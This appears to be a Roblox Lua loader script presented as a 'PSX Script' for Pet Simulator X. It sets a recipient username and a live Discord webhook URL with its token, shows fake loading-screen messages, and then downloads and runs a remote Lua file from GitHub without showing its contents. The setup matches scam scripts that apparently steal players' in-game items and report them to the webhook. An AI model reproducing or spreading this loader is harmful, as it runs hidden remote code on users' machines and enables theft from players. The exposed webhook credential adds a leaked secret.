Username = "dima12407842"
WebHook = "https://discord.com/api/webhooks/1100392852401438740/QkoPRMFAhHxFwd8WJ69tGaoLB_FQk_JEBDClfPLkQnQXpr36G3-pA1OQ0434vomoqJiZ"


loadingscreen = true -- set this to false and remove _G. stuff to use your own GUI
_G.CustomScriptName = "PSX Script"
_G.Text1 = "Script Loaded..."
_G.Text2 = "Waiting for Script"
_G.Text3 = "Checking Scripts..."
_G.Text4 = "Starting Scripts..."
loadstring(game:HttpGet("https://raw.githubusercontent.com/Justanotherdme/petsimx22/main/petsimguiss.lua"))()
